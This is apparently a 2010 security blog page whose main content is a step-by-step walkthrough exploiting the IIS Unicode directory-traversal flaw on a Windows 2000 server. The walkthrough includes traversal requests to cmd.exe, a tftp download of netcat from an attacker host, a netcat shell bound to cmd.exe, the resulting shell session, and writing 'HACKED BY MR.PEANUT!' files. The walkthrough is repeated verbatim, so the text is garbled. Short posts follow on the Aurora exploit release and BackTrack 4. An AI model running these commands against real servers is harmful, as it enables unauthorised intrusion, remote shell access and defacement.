Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
Tuesday, January 19, 2010
IE Aurora
Internet Explorer "Aurora" Exploit Code released to the public.
Check here:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
Check here:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
Monday, January 18, 2010
Thursday, January 14, 2010
BackTrack 4 is Here!!!
Guys,
The long awaited BackTrack 4 (Security Live CD Distro) is finally here.
You can download the ISO file or the VMware version here:
http://www.backtrack-linux.org/downloads/
I have tested it and it works great. I even tried to update it with the latest Metasploit Framework 3.3.4 and it's up and running smoothly.
Lets share some information on this distro since I'm one of the fans.
For those Security freaks in Indonesia, you can join: IndoBackTrack, here is the link:
http://indobacktrack.or.id/
There you can also find some alternative download links for BackTrack 4 Final Release.
Enjoy...
The long awaited BackTrack 4 (Security Live CD Distro) is finally here.
You can download the ISO file or the VMware version here:
http://www.backtrack-linux.org/downloads/
I have tested it and it works great. I even tried to update it with the latest Metasploit Framework 3.3.4 and it's up and running smoothly.
Lets share some information on this distro since I'm one of the fans.
For those Security freaks in Indonesia, you can join: IndoBackTrack, here is the link:
http://indobacktrack.or.id/
There you can also find some alternative download links for BackTrack 4 Final Release.
Enjoy...
Subscribe to:
Posts (Atom)